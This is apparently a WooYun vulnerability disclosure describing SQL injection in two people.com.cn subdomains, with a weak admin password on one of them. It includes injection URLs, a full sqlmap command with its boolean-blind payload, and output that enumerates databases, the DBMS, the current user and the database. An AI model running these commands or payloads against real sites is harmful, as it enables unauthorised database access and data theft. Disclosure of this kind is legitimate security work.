WooYun.org

站点1：
http://mms.people.com.cn 人民手机媒体网
id参数没有过滤，导致后续的注射、mysql信息泄露（root用户）、后台沦陷+弱口令
注入链接：
http://mms.people.com.cn/music/admin/song_edit.php?id=29
上神器havij

mysql root密码暴露，可md5反查。

Data Bases: information_schema
music
mysql
newsite
test
waf_music
后台密码弱口令 用户名密码1

使用注入的地址可直接跳转到后台地址；
http://mms.people.com.cn/music/admin/login.php

可添加，删除，创建，未深入。后台产生的部分数据位wvs扫描产生，请自行删除。
------------------------------我是分割线------------------------------
站点2：
http://liuxueku.people.com.cn 人民网留学生校库
post数据里面的key参数没有过滤，导致注射
sqlmap跑起来
sqlmap.py -u "http://liuxueku.people.com.cn/jiaoren/senddata.aspx" --data "c=175&key=A" -p "key" --dbs --current-user --current-db
POST parameter 'key' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] n
sqlmap identified the following injection points with a total of 66 HTTP(s) requ
ests:
---
Place: POST
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: c=175&key=A' AND 8028=8028 AND 'uGfN'='uGfN
---
[13:15:14] [INFO] testing MySQL
[13:15:23] [WARNING] the back-end DBMS is not MySQL
[13:15:23] [INFO] testing Oracle
[13:15:33] [WARNING] the back-end DBMS is not Oracle
[13:15:33] [INFO] testing PostgreSQL
[13:15:42] [WARNING] the back-end DBMS is not PostgreSQL
[13:15:42] [INFO] testing Microsoft SQL Server
[13:16:01] [INFO] confirming Microsoft SQL Server
[13:16:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[13:16:42] [INFO] fetching current user
[13:16:42] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[13:16:42] [INFO] retrieved: jiaoyu
current user: 'jiaoyu'
[13:26:17] [INFO] fetching current database
[13:26:17] [INFO] retrieved: Devuniver
current database: 'Devuniver'
29张表，有点慢，没有深入。

over